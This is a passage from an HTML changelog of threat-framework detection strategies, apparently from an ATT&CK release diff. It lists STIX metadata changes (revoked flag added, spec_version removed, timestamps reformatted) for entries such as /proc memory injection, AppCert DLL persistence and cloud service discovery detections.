collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0567] Detecting Unauthorized Collection from Messaging Applications in SaaS and Office Environments</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0541] Detection Strategy for /proc Memory Injection on Linux</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0345] Detection Strategy for Abuse Elevation Control Mechanism (T1548)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0033] Detection Strategy for Accessibility Feature Hijacking via Binary Replacement or Registry Modification</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0373] Detection Strategy for Addition of Email Delegate Permissions</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0531] Detection Strategy for Additional Cloud Credentials in IaaS/IdP/SaaS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0362] Detection Strategy for AppCert DLLs Persistence via Registry Injection</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0017] Detection Strategy for Application Shimming via sdbinst.exe and Registry Artifacts (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0332] Detection Strategy for AutoHotKey & AutoIT Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0428] Detection Strategy for Bind Mounts on Linux</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0237] Detection Strategy for Boot or Logon Initialization Scripts: RC Scripts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0459] Detection Strategy for Build Image on Host</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0545] Detection Strategy for Cloud Administration Command</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0539] Detection Strategy for Cloud Application Integration</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0169] Detection Strategy for Cloud Infrastructure Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0402] Detection Strategy for Cloud Service Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 